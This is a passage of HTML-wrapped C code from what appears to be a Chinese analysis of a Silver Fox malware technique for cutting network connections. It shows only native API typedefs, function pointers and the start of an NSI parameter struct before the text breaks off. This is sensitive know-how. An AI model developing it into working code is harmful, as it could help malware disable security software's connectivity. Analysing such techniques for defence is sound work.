style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// ---------------------------------------------</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Dynamic NT Native Function Pointers</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// ---------------------------------------------</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">typedef</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NTSTATUS</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WINAPI</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NtDeviceIoControlFile_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE, HANDLE, PVOID, PVOID,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID, ULONG, PVOID, ULONG, PVOID, ULONG</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">typedef</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NTSTATUS</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WINAPI</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NtWaitForSingleObject_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE, BOOLEAN, PLARGE_INTEGER</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">typedef</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ULONG</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WINAPI</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> RtlNtStatusToDosError_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NTSTATUS</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Global function pointers</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NtDeviceIoControlFile_t pNtDeviceIoControlFile </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NtWaitForSingleObject_t pNtWaitForSingleObject </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">RtlNtStatusToDosError_t pRtlNtStatusToDosError </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">//IO_STATUS_BLOCK</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">typedef</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">struct</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> _IO_STATUS_BLOCK </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">union</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">NTSTATUS Status</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">PVOID Pointer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">ULONG_PTR Information</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> IO_STATUS_BLOCK, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> PIO_STATUS_BLOCK</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">typedef</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">struct</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> _NSI_SET_PARAMETERS_EX </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: 